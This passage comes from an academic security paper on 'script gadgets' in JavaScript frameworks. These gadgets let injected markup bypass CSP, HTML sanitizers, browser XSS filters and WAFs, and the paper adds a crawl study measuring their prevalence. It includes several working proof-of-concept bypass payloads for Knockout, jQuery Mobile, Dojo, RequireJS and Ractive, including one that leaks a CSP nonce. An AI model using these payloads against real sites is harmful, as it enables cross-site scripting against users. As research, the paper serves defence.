    allows us to investigate eval-based gadgets.
  - The strict-dynamic source expression is usually used
    together with a nonce-based CSP to automatically
    propagate the trust of a nonced script to all script elements
    generated by it.
• Client-side HTML sanitizers using different approaches
  of sanitization:
  - DOMPurify is a JavaScript-based HTML sanitizer
    that supports HTML, SVG, MathML, among others.
  - Google’s Closure library contains another
    JavaScript-based HTML sanitizer that only supports
    HTML.
• Web Application Firewalls are request filtering
  mitigations deployed as hardware in front of web servers, as well
  as software next to the web server itself.
  - ModSecurity is an open-source Web Application
    Firewall, commonly used with the OWASP Core Rule
    Set.
• XSS filters employ either request filtering, response
  sanitization or code filtering approaches.
  - Chrome / Safari employs a code filtering approach,
    blacklisting scripts that appear in the request.
  - Internet Explorer / Edge employs a response
    sanitization approach, rewriting potentially dangerous
    responses with something safe.
  - NoScript employs a request filtering approach,
    blocking requests that look suspicious or potentially
    malicious.

Category          Mitigation       Libraries with bypass gadgets
CSP               Whitelists       3
CSP               Nonces           4
CSP               Unsafe-eval      10
CSP               Strict-dynamic   13
XSS Filters       Chrome           13
XSS Filters       Edge             9
XSS Filters       NoScript         9
HTML Sanitizers   DOMPurify        9
HTML Sanitizers   Closure          6
WAFs              ModSecurity      9
Table 1: Mitigation-bypasses via gadgets in 16 Popular Libraries
4.1.2 Collecting a list of popular JavaScript libraries. In order to
find as many different gadgets as possible to test against mitigations,
we decided to search for gadgets in different popular JavaScript
frameworks and libraries. We obtained the lists of popular
frameworks and libraries from various online resources¹² ¹³ ¹⁴ ¹⁵ ¹⁶. From
those lists, we focused on searching for gadgets in the following
frameworks (selected based on popularity and code familiarity by
the authors):
• Trending JavaScript frameworks (Vue.js, Aurelia, Polymer)
• Widely popular frameworks (AngularJS, React, EmberJS)
• Older but still popular frameworks (Backbone, Knockout,
  Ractive, Dojo)
• Libraries and compilers (Bootstrap, Closure, RequireJS)
• jQuery-based libraries (jQuery, jQuery UI, jQuery Mobile)
The process we used for manually identifying gadgets is de-
scribed in Section 3.7.1, but generally it was done by identifying
HTML
and
eval
-based sinks, as well as any documented feature that
seemed like an expression language. In cases when no sinks of that
form were reachable, we then looked for any mechanism exposed
by the framework or library that touched the DOM in any way, and
manually audited the code.
In Table 1 we summarize how many frameworks had gadgets that
could bypass each of the mitigations. The complete collection of bypasses
found during this analysis is available in the GitHub repository
(footnote 17).
12 Mustache Security is a list of frameworks with gadgets.
   https://github.com/cure53/mustache-security/tree/master/wiki
13 GitHub contains a list of trending front-end JavaScript frameworks.
   https://github.com/showcases/front-end-javascript-frameworks
14 TodoMVC is a list of implementations of a sample application written
   in many different JavaScript frameworks. http://todomvc.com/
15 JS.org Rising Stars 2016 is based on the activity on different GitHub
   projects related to JavaScript frameworks in 2016.
   https://risingstars2016.js.org/
16 State of JS 2016 is based on a survey of web developers.
   http://stateofjs.com/2016/frontend/
17 https://github.com/google/security-research-pocs
Table 2 within the Appendix also summarizes our research findings.
For clarity, in the following sections we present and discuss only a
selection of those bypasses.
4.2 Bypassing Request Filtering Mitigations
Request filtering mitigations attempt to identify malicious or untrusted
HTML patterns, and stop them before they reach the application.
To accomplish this, these mitigations generally employ the
following approaches:
Enumerate known strings used in attacks.
For ex-
ample, HTML tags like
<script>
or attributes such as
onerror
allow the user to execute JavaScript with a single
HTML injection. The ModSecurity Core Rule Set version
3.0 is, at the time of writing, one of the most comprehensive
lists of attack vectors.
Detect characters used to escape from the contexts
where XSS vulnerabilities usually occur.
For example,
if an XSS vulnerability arises because HTML can be injected directly
where the application expected to output only text, a request
filtering mitigation will attempt to detect the injection of < or >.
If the vulnerability is present when injecting inside
an HTML attribute, an attempt to escape from the attribute would be
detected as the attack.
Detect patterns and sequences frequently used in ex-
ploits.
For example, when an XSS attack is successful, the
attacker will often attempt to steal credentials, or issue HTTP
requests. Therefore, some mitigations attempt to detect access
to document.cookie, or access to XMLHttpRequest.
They also attempt to detect the usual mechanisms for obfuscating
code execution, like references to eval or innerHTML, even
after applying several layers of aggressive decoding.
Examples of XSS mitigations that adopt these approaches are:
NoScript XSS Filter
Web Application Firewalls
Request filtering mitigations detect only specific, XSS-related
HTML tags and attributes. Gadgets use HTML tags and attributes
that are considered benign, and that makes them capable of bypassing
such mitigations. For example, if a library takes the value of the
data-html attribute and executes it as HTML, mitigations in this
group would not be able to detect that as malicious. An example of
HTML markup triggering such a gadget chain was shown in Listing
11.
In addition, detection of context-breaking characters
becomes ineffective because some gadgets change the meaning
of otherwise-safe text sequences, and make them dangerous. For
example, in AngularJS two curly braces {{ mark
the beginning of an AngularJS expression. Aurelia, in turn,
uses a different delimiter: ${. An example of such seemingly benign
markup was shown in Listing 9.
<iframe src="//knockout.example.com/?xss=
<div data-bind=value:a=location></div>
<div data-bind=value:a.href=name></div>"
name="javascript:alert(1)"></iframe>
Listing 13: Example of bypassing NoScript with Knockout
gadget
A good example of how to bypass request filtering mitigations
like NoScript with gadgets is presented in Listing 13. In this example
the expressiveness of the framework is used to split an exploit
such as location.href=name (which is detected as an attack by
NoScript, as the global name property can generally be set by an
attacker to arbitrary content) into two components: a=location
followed by a.href=name. Individually, these expressions are harmless,
but together they allow the attacker to redirect the user to a
JavaScript URL specified in the name attribute. NoScript is not able
to parse the markup to figure out that they are both meant to be
executed together.
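The splitting idea can be illustrated with a toy request filter. The sketch below is not NoScript's rule set: the pattern list, the function name looksMalicious, and the "direct" Knockout payload are assumptions chosen only to show why a pattern written for the combined expression misses its two halves.

```javascript
// Toy request filter (hypothetical; NOT NoScript's real rules).
// A parameter is flagged if any known-bad pattern matches.
const SUSPICIOUS_PATTERNS = [
  /<script\b/i,                        // script tags
  /\bon\w+\s*=/i,                      // inline event handlers such as onerror=
  /location\s*\.\s*href\s*=\s*name/i,  // window.name assigned to location.href
];

function looksMalicious(param) {
  return SUSPICIOUS_PATTERNS.some((re) => re.test(param));
}

// Illustrative direct exploit: the combined expression is matched.
const direct = "<div data-bind=value:location.href=name></div>";

// Split exploit taken from Listing 13: neither half matches on its own.
const split =
  "<div data-bind=value:a=location></div>" +
  "<div data-bind=value:a.href=name></div>";

console.log(looksMalicious(direct)); // true
console.log(looksMalicious(split));  // false
```

Adding a pattern for each half would not help much in practice, since a=location and a.href=name are ordinary expressions that legitimate pages may also contain.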
4.3 Bypassing Response Sanitization
Mitigations
Response sanitization mitigations are designed to reduce the number
of false positive results that are potentially generated by request
filtering. Instead of blocking potentially malicious requests,
response sanitization mitigations aim to detect whether a suspicious
payload actually gets injected into the response.
Response sanitization mitigations usually follow one of two
different techniques:
Remove or neuter the malicious attack.
One possible
way to tackle the potential injection of code is to neuter
it, or remove it from the HTTP response. In this approach,
the rest of the response is left as-is, but the suspicious code
is removed or made inert.
Block the response completely.
Another possible way
to react to an injection attempt is to completely block the
response, and display an error to the user. This approach
avoids cases in which an attacker tricks a mitigation tech-
nique into blocking a legitimate script (e.g. a frame buster).
Examples of implementations of XSS mitigations that adopt these
types of approaches are:
HTML sanitizers.
Most HTML sanitizers work by taking
a piece of HTML code and cleaning it of any malicious
input, and returning otherwise safe HTML. Most HTML
sanitizers, however, are based on whitelists that try to enu-
merate safe HTML tags and attributes across all browsers.
Internet Explorer / Edge XSS filter.
The XSS filter in
Microsoft Internet Explorer and Edge also sanitizes HTML
by replacing parts of HTML attributes and tag names with
a pound symbol (#). Note that while HTML sanitizers use
whitelists, XSS filters work on a blacklisting
approach, enumerating dangerous HTML tags and
attributes known by the browser.
Bypassing HTML sanitizers usually requires a slightly different
approach than bypassing XSS filters. For HTML sanitizers, the
gadgets must reuse an otherwise safe and whitelisted attribute,
such as class or id. Gadgets that bypass XSS filters can also use
custom HTML tags and attributes such as ng-click in Angular or
v-html in Vue.
Mitigations based on response sanitization only block
vulnerabilities and make no attempt to detect artifacts of exploits.
This makes them easier to bypass, since gadgets are by definition
"safe" code that becomes unsafe when it interacts with other
JavaScript code that is otherwise safe. Aiming to lower the false
positive rate by using response sanitization has the downside of not
being able to detect attacks that exploit features that are normally
safe when the JavaScript library is not used.
<div data-role=popup id='-->
&lt;script&gt;alert(1)&lt;/script&gt;'>
</div>
Listing 14: Example of bypassing DOMPurify with jQuery
Mobile gadget
An example of how to use gadgets to bypass response sanitization
mitigations is presented in Listing 14. As far as DOMPurify
is aware, the HTML it sanitized is completely safe. However,
jQuery Mobile, upon encountering an element with the attribute
data-role=popup, will automatically try to inject an HTML comment
containing the element's id. In the code above, we can escape from that
comment and execute our code. Note that the same attack works against
Internet Explorer's XSS filter.
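The comment escape can be reproduced with plain string handling. The following is a simplified model, not jQuery Mobile's source code: buildPlaceholder and the comment text are hypothetical, and the only property that matters is that the id is concatenated into an HTML comment without escaping.

```javascript
// Simplified model of a comment-writing gadget (an assumption made for
// illustration; this is not jQuery Mobile's actual implementation).
function buildPlaceholder(id) {
  // The id is concatenated into an HTML comment without any escaping.
  return "<!-- placeholder for " + id + " -->";
}

// Value of the id attribute from Listing 14 once the HTML parser has
// decoded the &lt; and &gt; entities.
const id = "-->\n<script>alert(1)</script>";

const markup = buildPlaceholder(id);
console.log(markup);

// The injected "-->" terminates the comment early, so the script tag
// ends up outside of the comment.
const commentEnd = markup.indexOf("-->");
const scriptStart = markup.indexOf("<script>");
console.log(scriptStart > commentEnd); // true
```

The sanitizer only ever sees the entity-encoded attribute value, which is why it has no reason to reject the markup.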
4.4 Bypassing Code Filtering Mitigations
Code filtering mitigations are an evolution on top of response sanitization.
They attempt to leave the potentially malicious markup
untouched, and instead focus on preventing the execution of malicious
code. This approach has an even lower false positive rate than
sanitization, since the code is filtered out only if it's actually about
to be executed.
However, one side effect of such an approach is that since gadgets
do not directly execute any malicious code, but do so indirectly
through trusted code, it is a lot harder for XSS mitigations based
on code filtering to detect injections using gadgets.
The approaches taken by XSS mitigations based on code filtering
are:
Detect malicious code.
To detect whether a specific piece
of code is malicious, it is checked against the HTTP request.
If the code to be executed is also present in the request,
it is blocked as not trustworthy and potentially attacker-controlled.
Detect benign code.
Benign code passes various policy
checks based on code provenance, content, or generation
method. Code violating the policy requirements is consid-
ered malicious and its execution is blocked.
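The "detect malicious code" approach can be sketched as a reflection check. This is a deliberately naive model under stated assumptions: isReflected, the example URLs and the substring comparison are hypothetical, and a real browser filter performs far more normalization. The check is applied to script code encountered while parsing the response.

```javascript
// Naive reflection check: a script is considered attacker-controlled if
// its source text also appears in the decoded request URL.
function isReflected(requestUrl, scriptSource) {
  const decoded = decodeURIComponent(requestUrl);
  return scriptSource.length > 0 && decoded.includes(scriptSource);
}

// Classic reflected XSS: the script body is present in the request.
const xssUrl =
  "https://victim.example/?q=" +
  encodeURIComponent("<script>alert(1)</script>");
console.log(isReflected(xssUrl, "alert(1)")); // true

// Gadget case: the request only carries an entity-encoded attribute
// value. The script the parser sees is the page's own gadget code.
const gadgetUrl =
  "https://victim.example/?q=" +
  encodeURIComponent('<div id="button" data-text="&lt;svg onload=verify()&gt;"></div>');
const gadgetCode = 'button.innerHTML = button.getAttribute("data-text");';
console.log(isReflected(gadgetUrl, gadgetCode)); // false
```

The handler that the gadget later creates through innerHTML is never presented to this parse-time check, which is the gap that gadget-based bypasses exploit.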
Examples of implementations of XSS mitigations that adopt this
approach are:
Chrome and Safari’s XSS Auditor.
The latest XSS filter
to be implemented in a major browser was Chrome and Safari's
XSS Auditor. The XSS Auditor hooks into the JavaScript
runtime in the browser. It uses the 'detect malicious code'
approach: before the Auditor permits code execution,
it validates that the code was not included in the
HTTP request, and blocks it if it was.
Content Security Policy.
Content Security Policy [34]
is the most popular example of a code filtering mitigation.
Web applications using this mitigation define a policy that
specifies which scripts are benign and should be allowed
to execute. Scripts violating the policy are blocked by the
supporting browser. Existing policies usually adopt one of
the filtering variants described in Section 4.1.1. A typical
policy is either URL whitelist-based or nonce/hash-based. A
policy may also use strict-dynamic and/or unsafe-eval
source expressions. These keywords propagate trust to
additional code created by already trusted scripts, making
CSP easier to adopt on existing websites.
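To make the policy variants concrete, the following sketch classifies the script-src directive of a policy string into the variants named above. It is a minimal parser written for illustration only: classifyScriptSrc and the example policy are assumptions, and the function expects a well-formed policy rather than implementing the full CSP grammar.

```javascript
// Classify the script-src directive of a CSP string into the variants
// discussed in the text. Minimal sketch; not a complete CSP parser.
function classifyScriptSrc(policy) {
  const directive = policy
    .split(";")
    .map((d) => d.trim().split(/\s+/))
    .find((tokens) => tokens[0].toLowerCase() === "script-src");
  const sources = directive ? directive.slice(1) : [];
  return {
    // Host and scheme sources are unquoted; 'self' is also origin-based.
    whitelist: sources.some((s) => !s.startsWith("'") || s === "'self'"),
    nonce: sources.some((s) => /^'nonce-[^']+'$/.test(s)),
    hash: sources.some((s) => /^'sha(256|384|512)-[^']+'$/.test(s)),
    unsafeEval: sources.includes("'unsafe-eval'"),
    strictDynamic: sources.includes("'strict-dynamic'"),
  };
}

const examplePolicy =
  "default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic' 'unsafe-eval'";
console.log(classifyScriptSrc(examplePolicy));
```

For the example policy the result reports a nonce-based policy that additionally carries both relaxing keywords, which is the combination examined in the bypasses that follow.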
Code filtering mitigations hook into code execution and aim to
ensure that only legitimate code gets executed. Since script gadgets are
already part of a legitimate code base, they are extremely useful in
bypassing this mitigation group. In the analysis performed against
popular frameworks and libraries in Section 4.1, we found that code
filtering mitigations are the ones most vulnerable to gadgets. We
used element construction gadgets (3.5.2), JavaScript execution sink
gadgets (3.5.4) and gadgets in expression parsers (3.5.5) to bypass
code filtering mitigations. While we found that expression-parser-based
gadgets were the most universally applicable, some of the bypass
methods employed were specific to a mitigation variant:
Bypassing XSS Auditor
. We bypassed XSS Auditor in 13 out
of 16 frameworks, as many gadgets use traditional DOM XSS [
16
]
sinks, DOM XSS protection being a known shortcoming of XSS
Auditor [
32
]. For example, a gadget in the Dojo framework calls an
eval
function, with the value extracted from the
data-dojo-props
attribute. This allowed us to create the following bypass:
<div
data-dojo-type="dijit/Declaration"
data-dojo-props="}-alert(1)-{">
</div>
Listing 15: Example of bypassing XSS Auditor with Dojo gad-
get
Bypassing unsafe-eval CSP.
In order to bypass CSP with an unsafe-eval
keyword we either used gadgets in expression parsers
or gadgets calling an eval-like function. Listing 15 demonstrates
a bypass using such a gadget. We were able to circumvent policies
using unsafe-eval in 10 out of 16 frameworks.
Bypassing strict-dynamic CSP.
Adding a
strict-dynamic
keyword to the CSP enables already trusted code to programmati-
cally create new script elements. When such scripts are introduced
into the DOM, they are implicitly trusted and allowed to execute.
We found that most analyzed JavaScript frameworks contain gad-
gets capable of creating and inserting script elements with con-
trolled body or
src
attribute. Such gadgets can be used to bypass
strict-dynamic
CSP. As an example, we present the bypass found
in RequireJS:
<script data-main='data:1,alert(1)'></script>
Listing 16: Example of bypassing strict-dynamic with Re-
quireJS gadget
Since the <script> tag has a data-main attribute, a gadget in
RequireJS will generate a new script element, with its source
pointing to data:1,alert(1). As RequireJS is already trusted,
strict-dynamic propagates this trust to the new element, and
the code will execute, bypassing the page's Content Security Policy.
We found
strict-dynamic
bypasses in 13 out of 16 tested frame-
works (two of the bypasses relied on co-presence of
unsafe-eval
).
The prevalence of script gadgets in the tested JavaScript frameworks
suggests that using the strict-dynamic variant of CSP to
mitigate XSS vulnerabilities in modern web applications is less
effective than previously thought [35].
Bypassing other CSP variants.
Both aforementioned CSP key-
words relax the restrictions of the policy in order to facilitate its
adoption. Some websites opt to use a stronger version of CSP, e.g.
relying solely on nonces, or using a whitelist of script source URLs,
with no known bypasses in the list of allowed origins [
35
]. We found
that even such variants of Content Security Policy can be bypassed
using script gadgets in expression parsers (3.5.5). In some frame-
works, expression parsers themselves create a runtime environment
that allows the attacker to obtain a
window
object reference and call
arbitrary JavaScript functions. Such vectors do not use
eval
and do
not create new script elements, so Content Security Policy cannot
detect and block them. Listings 11 and 12 present examples of this
type of bypass. Such gadgets were found in Aurelia, Vue.js and
Polymer 1.x. Additionally, in Ractive we found a gadget capable of
exfiltrating the CSP nonce into a newly created script, allowing for
its execution, despite a strong, purely nonce-based policy:
<script id='template' type='text/ractive'>
<iframe srcdoc='<script
nonce={{@global.document.currentScript.nonce}}>
alert(document.domain)
</{{}}script>'>
</iframe>
</script>
Listing 17: Bypass exfiltrating CSP nonce in Ractive
It's worth noting that the success of the CSP mitigation depends on
the variant used. If the policy is configured to use whitelists, hashes,
or nonces alone, then only gadgets in expression parsers (3.5.5) are
useful, as the code passed to JavaScript execution sinks (3.5.4) would
not be trusted. A notable exception is strict-dynamic, which
propagates trust to
<script>
tags generated programmatically.
Attackers may bypass such CSP with gadgets generating arbitrary
HTML elements, or importing nodes from foreign DOM documents.
Such gadgets are common in templating libraries.
As we have presented above, the gadgets used to bypass different
mitigations vary significantly from mitigation to mitigation. Some
abuse the expression language in libraries, others inject markup
in a text attribute, while others abuse trust propagation in DOM
element creation. This indicates which type of gadgets to search
for to bypass different types of mitigations.
5 PREVALENCE OF SCRIPT GADGETS
In this section we present the results of an empirical study on the
prevalence of script gadgets in real-world applications. We first
present our research questions and methodology, then discuss the
results.
5.1 Research Statement
As shown above, script gadgets have the potential to undermine
the protections provided by XSS mitigations. While we manually
discovered many of these gadgets in popular libraries, it is important
to understand the prevalence of these code patterns at scale. If
gadgets are rare in real-world code, we can address the problem by
taking special care when building generic libraries. If script gadgets
are widespread in real-world applications, however, addressing this
problem might be as hard as fixing XSS itself. Therefore, the goal
of this study is to measure the prevalence of gadgets in real-world
applications.
After measuring gadget pervasiveness, we aim to find out more
about the impact of script gadgets on specific XSS mitigations.
Specifically, we would like to focus on the Content Security Policy
and HTML sanitizers as these mitigation techniques seem to be the
most robust and relevant ones.
A previous study [35] has already demonstrated that domain
whitelisting and the 'unsafe-inline' CSP source expression
harm the protection capabilities of CSP. In this study, we'd like
to investigate the 'unsafe-eval' and 'strict-dynamic' source
expressions. Specifically, we want to investigate how prevalent
script gadgets are that can potentially bypass these expressions.
Many sanitizers, by default, allow seemingly benign attributes
such as
data-*
,
id
or
class
. Furthermore, sanitizers usually allow
non-malicious tags such as
div
or
span
tags. Hence, we’d like to
understand how many real-world gadget chains can be triggered
from such tags and attributes.
5.2 Methodology
In order to detect gadgets in real-world applications, we built a
toolchain to automatically detect and verify them at scale. Based
on this toolchain, we crawled the Alexa Top 5000 Web sites.
Detecting Gadgets at Scale. As we did not expect to see many expression
parsers (see 3.5.5) present in user-land code (assuming that
expression parsers are mostly present in JavaScript frameworks),
we decided to focus on gadgets that end in HTML, JavaScript or URL
execution sinks (see 3.5.4). In order to detect such potential gadgets,
we built a browser-based, dynamic taint tracking engine. The engine
is capable of reporting data flows from DOM nodes into security-sensitive
functions such as eval, innerHTML, document.write, or
XMLHttpRequest.open() (footnote 18). We used this engine to crawl our data
set and identify all data flows. Each of these flows represents a
potentially exploitable gadget chain.
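The notion of a reported data flow can be illustrated in user-land code. The engine described above is built into the browser; the wrapper below is only a sketch, and the Tainted class, readAttribute, sink and the plain-object "element" are all hypothetical stand-ins.

```javascript
// Minimal illustration of source-to-sink taint reporting.
class Tainted {
  constructor(value, source) {
    this.value = value;
    this.source = source; // e.g. "div#button[data-text]"
  }
}

const reportedFlows = [];

// Hypothetical instrumented source: attribute reads return tainted values.
function readAttribute(element, attr) {
  const label = `${element.tag}#${element.id}[${attr}]`;
  return new Tainted(element.attrs[attr], label);
}

// Hypothetical instrumented sink: records a flow when its argument is tainted.
function sink(name, arg) {
  if (arg instanceof Tainted) {
    reportedFlows.push({ sink: name, source: arg.source, value: arg.value });
    return arg.value;
  }
  return arg;
}

// Plain-object stand-in for a DOM element.
const button = {
  tag: "div",
  id: "button",
  attrs: { "data-text": "I am a button" },
};

sink("innerHTML", readAttribute(button, "data-text")); // reported
sink("innerHTML", "static string");                    // not reported
console.log(reportedFlows);
```

Each recorded entry corresponds to one candidate gadget chain: a DOM source, a security-sensitive sink, and the value that travelled between them.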
Verifying Gadgets. In order to verify whether a found flow is
exploitable from benign HTML markup, we built a generator that
is capable of creating a real-world exploit based on each flow. The
generator is similar to the one presented in [17]. Subsequently, we
simulate a reflected XSS vulnerability in the page, into which we
inject the generated exploit. The goal of the exploit is to indirectly
execute a JavaScript function from a source that would not usually
execute such code (e.g. from a data- attribute). Listing 18 shows
an exemplary gadget that might exist in a legitimate JavaScript file.
<!-- source element -->
<div id="button" data-text="I am a button"></div>
<script>
// Script gadget reading from #button element.
var button = document.getElementById("button");
button.innerHTML = button.getAttribute("data-text");
</script>
Listing 18: An exemplary gadget
For this sample, the engine detects a data flow originating from
button.getAttribute("data-text") that ends up in the HTML
execution sink innerHTML. Based on the context of the sink (HTML,
JavaScript, URL), the exploit generator generates an exploit that
triggers JavaScript execution within this context:
<svg onload=verify()>
Listing 19: XSS payload
Subsequently, we use the source element to generate the final
exploit as shown in Listing 20. The actual XSS payload can thereby
be disguised via the use of different encoding schemes (depending
on the injection context).
<div id="button"
data-text="&lt;svg onload=verify()&gt;">
</div>
Listing 20: Final Exploit
This lets us build the exploits in a way that our verifier function
does not trigger by default. This function is called only if a script
gadget reads the payload from benign markup and executes it.
Therefore, if the function gets called, we have verified the gadget
in a false-positive-free way.
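The step from a detected flow to the final exploit can be sketched as follows. This is not the generator used in the study: the flow record shape, generateExploit and escapeAttribute are assumptions, and only the HTML payload is taken from Listing 19 (the JavaScript and URL payloads are illustrative guesses).

```javascript
// Sketch of an exploit generator driven by the sink context of a flow.
function escapeAttribute(value) {
  return value
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

const PAYLOADS = {
  html: "<svg onload=verify()>",   // from Listing 19
  javascript: "verify()",          // assumed payload for eval-like sinks
  url: "javascript:verify()",      // assumed payload for URL sinks
};

// flow: { tag, id, attribute, context } (hypothetical record shape)
function generateExploit(flow) {
  const payload = PAYLOADS[flow.context];
  if (payload === undefined) {
    throw new Error("unsupported sink context: " + flow.context);
  }
  const encoded = escapeAttribute(payload);
  return `<${flow.tag} id="${flow.id}" ${flow.attribute}="${encoded}"></${flow.tag}>`;
}

const exploit = generateExploit({
  tag: "div",
  id: "button",
  attribute: "data-text",
  context: "html",
});
console.log(exploit);
// <div id="button" data-text="&lt;svg onload=verify()&gt;"></div>
```

Because the payload is entity-encoded inside an attribute, it cannot execute on its own; verify() only runs if a gadget reads the attribute and passes the decoded value to a sink.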
18
In total the engine supports 60+ sinks, which we cannot easily list due to space
constraints
Crawling The Data Set. Our initial seed data set consists of the
Alexa Top 5000 Web sites. We crawled these pages and also visited
all the http: and https: links from these pages that point
to the same domain or a subdomain. This approach might bias
the data set, since Web pages with more links on the start pages
will be over-represented in the final data set. The same is true for
subdomains: some Web sites make excessive use of subdomains,
while others do not use them at all. Because of this, we decided
to deduplicate our final results based on the first domain before
the top level domain (subsequently called "second level domains").
E.g. we merge results from sub.example.co.uk, example.co.uk
and foo.example.co.uk and regard all of these domains as
belonging to example.co.uk. We are aware that this approach has
a significant impact on the final results, but we think that this
provides the most realistic view on the data.
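The deduplication rule can be written down as a small function. The sketch below assumes a tiny, hand-picked suffix set; PUBLIC_SUFFIXES is a hypothetical stand-in for a complete public suffix list, and registrableDomain is not taken from the study's tooling.

```javascript
// Merge hostnames by "second level domain" as defined in the text.
// PUBLIC_SUFFIXES is a deliberately tiny, hypothetical sample.
const PUBLIC_SUFFIXES = new Set(["com", "de", "uk", "co.uk"]);

function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().split(".");
  // Try the longest candidate suffix first, then keep one more label.
  for (let i = 0; i < labels.length - 1; i++) {
    const candidate = labels.slice(i + 1).join(".");
    if (PUBLIC_SUFFIXES.has(candidate)) {
      return labels.slice(i).join(".");
    }
  }
  return hostname.toLowerCase();
}

const crawledHosts = [
  "sub.example.co.uk",
  "example.co.uk",
  "foo.example.co.uk",
  "www.google.com",
];

const merged = new Set(crawledHosts.map(registrableDomain));
console.log([...merged]); // [ 'example.co.uk', 'google.com' ]
```

All three example.co.uk hostnames collapse into one entry, so a site with many subdomains contributes a single data point to the per-domain percentages.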
5.3 Limitations
Our testing and verification approach has the following limitations:
Only first-level links:
We only followed the first level of links,
so our data set does not cover all the pages of a site.
No user interaction:
Our crawlers do not interact with the page.
This means that we are only able to find gadgets in code that gets
executed at page load by default.
No authentication:
Our crawlers do not authenticate to the
pages under test. Consequently, we might have missed results in
authenticated parts of an application, significantly reducing the
potential coverage of crawled web applications.
Verification does not focus on mitigation bypasses:
In the
study, we do not artificially add, modify or remove any specific
XSS mitigation on the crawled websites. We only verify that a data flow
from a non-executing source is capable of executing arbitrary code
in a page via a gadget, even in the presence of a given mitigation.
The reason for this is that some mitigations cannot be easily applied
to Web sites. For example, applying a Web Application Firewall or
Content Security Policy (see 2.3) to a page requires a non-trivial
amount of configuration, and is likely to break functionality
when done automatically. Furthermore, exploits need to be adapted
to the specific mitigation techniques. Hence, by focusing on the
mere code execution aspect, we can verify gadgets more efficiently.
Our XSS simulation approach is false-negative-prone:
In
a real-world mitigation setting, the initial XSS attack should be
blocked by stopping the execution of the injected code. However,
even when the original injection was stopped, a gadget can still
potentially execute the injected content, effectively bypassing the
mitigation. For example, while script elements are initially blocked
by CSP, they remain in the DOM and gadgets may reintroduce
them, triggering them again. While this would be a valid mitigation-specific
bypass, this payload would execute directly without triggering
any gadget when a CSP is not present. In order to avoid
such false-positive findings, we only generate exploits that do not
trigger JavaScript execution by default. For example, we did not
inject gadgets in the following form:
<div id="foo"><script>verify()</script></div>
Listing 21: Invalid Exploit
Instead, we transform the payload into a form that cannot exe-
cute by default, by using the xmp plaintext tag, for example:
<xmp id="foo"><script>verify()</script></xmp>
Listing 22: Non-executing Exploit
While this approach completely removes false positives from
our results, it might cause a considerable number of false negatives.
For example, often the name of a tag is part of the DOM selector
triggering the gadget. Hence, by changing the tag name (in the
example: from div to xmp), the exploit might not be able to trigger
the gadget correctly. Effectively, we lowered our verification rate
and in turn significantly increased the quality of our results.
Limitation Summary. All these limitations should be taken into
account when reading the following sections. Most importantly,
we want to point out that the presented results are lower bounds.
If deep crawling, user interaction and a less restrictive verification
are applied, the resulting numbers will likely be higher.
5.4 Results
This section is divided into several subsections. After reporting
on general crawling results, we present numbers and statistics
about the detected data flows. Then we report on the results of our
automatic gadget verification, and finally we discuss the results in
the context of XSS mitigation techniques.
5.4.1 Crawling Results. As mentioned above, our initial data set
consisted of the Alexa Top 5000 Web sites. By following the first-level
links, we crawled 647,085 Web pages on the same domains or
subdomains of this set, which finally contained 37,232 different
subdomains and 4,557 second-level domains. The number of second-level
domains is lower than 5000, because some entries in the Alexa
Top Sites file redirect to the same domain based on geolocation. For
example, google.it, google.de, google.fr all redirect to google.com.
Furthermore, some Web sites were not reachable or timed out while
crawling. In some cases, this is due to sites that only use regional
CDNs. For example, a site from Asia might be fast in Asia but very
slow when requested from the US or Europe. For all the remaining
pages, we collected data flows using our taint engine.
5.4.2 Taint Results. On average we measured 7.67 sink calls per
crawled URL and around 450 sink calls aggregated per second-level
domain. In total, we counted 4,352,491 sink calls with data result-
ing from 4,889,568 unique sources within the DOM. Grouped by
second-level domain, sink and source, we measured 22,379 unique
combinations.
5.4.3 Mitigation results. In the following, we want to relate
these results to the XSS mitigations, especially CSP ’unsafe-eval’,
CSP ’strict-dynamic’ and HTML sanitizers.
Content Security Policy - 'unsafe-eval': As opposed to the 'unsafe-inline'
keyword, unsafe-eval in the past seemed to be more secure
in general. While unsafe-inline almost completely removes the
protection capabilities of a CSP policy, unsafe-eval by default
does not make the policy bypassable. In order to bypass a policy
with unsafe-eval, an attacker needs to find an injection into a
JavaScript execution function (eval, new Function, setTimeout,
setInterval, etc.). Finding a direct injection is often hard and time
consuming, because the use of such functions is limited and can be
easily audited by the application owner. Hence 'unsafe-eval' was
seen as an acceptable trade-off between security and usability of
CSP. However, the results of our study imply that this long-held
belief should be revised. Gadgets can be used as an indirect way
of reaching an execution sink. If DOM content gets evaluated by
default, the attacker can inject the code as a DOM node in order
to abuse the eval-gadget to execute arbitrary code. In our data
set 47.76% of all second-level domains contained a data flow that
ended within a JavaScript execution function. During our crawl, for
example, our automated tooling unintentionally bypassed Tumblr's CSP
policy with a gadget bypassing its unsafe-eval source expression.
Content Security Policy - ’strict-dynamic’: The
strict-dynamic
source expression was added to CSP to increase the usability of
nonce-based policies. As described in 4.1.1,
strict-dynamic
en-
ables automatic trust propagation to child scripts. If a nonced, and
thus legitimate, script appends a child script element to the DOM,
the child script would be blocked unless the parent script propa-
gates the nonce to the script as well. As many libraries are not aware
of CSP, these libraries do not propagate the nonce and thus CSP
would block the child script and break the library’s functionality.
When
strict-dynamic
is enabled trust is automatically propa-
gated to non-parser-inserted script elements. Consequently, under
strict-dynamic
, child script elements are automatically executed
even if they do not carry a nonce. In this situation, attackers may
use gadgets to bypass CSP. If DOM content gets injected into a
script element, or into a library function (e.g.
jQuery.html
) that
creates and appends new
script
elements,
strict-dynamic
CSP
can be bypassed. In order to measure potentially affected Web sites,
we counted the following data flows:
Data flows ending within text, textContent or
innerHTML of a script tag
Data flows ending within text, textContent or innerHTML
of a tag, where the tag name is DOM-controlled
(tainted)
Data flows ending within script.src
Data flows ending in an API which is known for creating
and appending script tags to the DOM.
In total, 73.03% of all second-level domains contained at least
one data flow with the described characteristics. For example, we
detected a gadget capable of bypassing strict-dynamic in Facebook's
fbevents.js library (footnote 19).
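The four counted categories can be expressed as a predicate over recorded flows. This is a sketch under stated assumptions: the flow record fields (sink, tagName, tagNameTainted) are hypothetical, and SCRIPT_CREATING_APIS contains only jQuery.html, the one example named in the text.

```javascript
// Decide whether a recorded data flow falls into one of the four
// strict-dynamic-relevant categories listed above.
const TEXT_SINKS = new Set(["text", "textContent", "innerHTML"]);
const SCRIPT_CREATING_APIS = new Set(["jQuery.html"]);

function isStrictDynamicRelevant(flow) {
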